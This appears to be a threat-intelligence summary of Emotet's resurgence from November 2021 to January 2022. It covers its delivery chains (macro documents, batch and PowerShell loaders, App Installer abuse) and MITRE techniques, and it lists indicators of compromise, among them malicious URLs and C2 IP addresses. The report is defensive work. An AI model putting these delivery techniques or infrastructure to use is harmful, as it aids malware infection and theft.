Threat Research

Emotet Summary: November 2021 Through January 2022

Securonix

Emotet resurfaced in November 2021 after a law-enforcement takedown and by January 2022 had returned to prominence as an email-distributed threat with evolving delivery chains. The report covers infection patterns from November 2021 to January 2022, including macro-based Office documents, batch and PowerShell loaders, App Installer abuse, and encrypted C2 traffic, highlighting its persistence and evasion techniques. #Emotet #AppInstaller #Trickbot #CobaltStrike #TA542 #Mealybug

Keypoints

  • Emotet rebounded in mid-November 2021 after a prior takedown and remained a top threat through January 2022.
  • Infection chains include malicious Office documents with macros, thread hijacking, and the use of a batch file to drop loaders and PowerShell commands.
  • Emotet began abusing Microsoft App Installer (and later .appinstaller/.appxbundle) to deliver its DLL payload, a method Microsoft later disabled.
  • Persistent infections use registry updates and backdated DLL timestamps to maintain presence across reboots.
  • C2 communications after revival shifted to encrypted HTTPS traffic with non-distinct certificate data, complicating detection.
  • December 2021 saw Cobalt Strike deployed on infected hosts and increasingly varied infection templates, including HTML applications and Excel-driven payloads.
  • January 2022 saw resumed spamming, personalized emails, and continued distribution of Emotet alongside loaded payloads (e.g., Cobalt Strike), with spambot activity often beginning within 35–45 minutes of infection.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – Emails distributing Emotet contain malicious attachments, or they contain links to malicious files. ‘Emails distributing Emotet contain malicious attachments, or they contain links to malicious files.’
  • [T1566.002] Phishing – Spearphishing Link – Emails with links to malicious pages or files used to initiate infection. ‘Emails distributing Emotet contain malicious attachments, or they contain links to malicious files.’
  • [T1059.001] Command-and-Scripting Interpreter – PowerShell – PowerShell command uses a base64-encoded string to retrieve and run the Emotet DLL. ‘The PowerShell command uses a base64-encoded string as shown.’
  • [T1059.003] Command-and-Scripting Interpreter – Command Prompt – Batch file dropped by macro execution uses cmd.exe to run commands. ‘C:WINDOWSsystem32cmd.exe /c c:programdatasdfhiuwu.bat’
  • [T1027] Obfuscated/Compressed Files and Information – Obfuscated batch/script and base64 encoding to hide payloads. ‘obfuscated script in the batch file generates a PowerShell command to retrieve an Emotet DLL and run it… base64-encoded string.’
  • [T1105] Ingress Tool Transfer – Downloading Emotet DLLs from multiple URLs for execution. ‘retrieve an Emotet DLL from one of seven URLs and save it to the C:ProgramData directory.’
  • [T1218.011] Signed Binary Proxy Execution – Rundll32 – Emotet DLL is run with rundll32.exe using a random entry point string. ‘The Emotet DLL is run with rundll32.exe using a random string of characters as the entry point.’
  • [T1547.001] Boot or Logon Autostart Execution – Registry Run Keys/Startup Folder – Emotet persistence via a Windows Registry update and backdated DLL timestamp. ‘Emotet is made persistent through a Windows Registry update… backdated exactly one week prior to the infection.’
  • [T1071.001] Web Protocols – Exfiltration/Command and Control over HTTPS – Post-revival C2 traffic is encrypted HTTPS, with certificate data observed in traffic. ‘certificate issuer data for Emotet C2 HTTPS traffic is…’

Indicators of Compromise

  • [SHA256] – Epoch 4 password-protected ZIP archives and related documents – a1ab66a0fbb84a29e5c7733c42337bc733d8b3c11e2d9f9e4357f47fb337c4d5, 176cfa7f0742d5a79b9cfbf266c437b965fc763cf775415ca251c6bb2dd5e9e5, and 2 more hashes
  • [URL] – Infected delivery URLs – hxxp://jamaateislami[.]com/wp-admin/FKyNiHeRz1/, hxxp://voltaicplasma[.]com/wp-includes/wkCYpDihyc8biTPn444B/
  • [IP address] – C2/hosting servers – 51.178.61.60:443, 103.161.172.108:443, and 122.129.203.163:443
  • [File name] – Malicious documents/spreadsheets – REP_1671971987654103376.xls, 8278500.xls, and 2 more
  • [File path] – Infected DLLs and related artifacts – C:ProgramData1245045870.dll, C:Users[username]AppDataLocalTzbklmcfljkklzcncxkf.pgk
  • [URL] – Additional infection resources – http://mustache.webstory[.]sa/wp-includes/cRwe2Pkxasj/, https://vdevigueta[.]com/wp-admin/qYOwD7kPD6JX/

Read more: https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint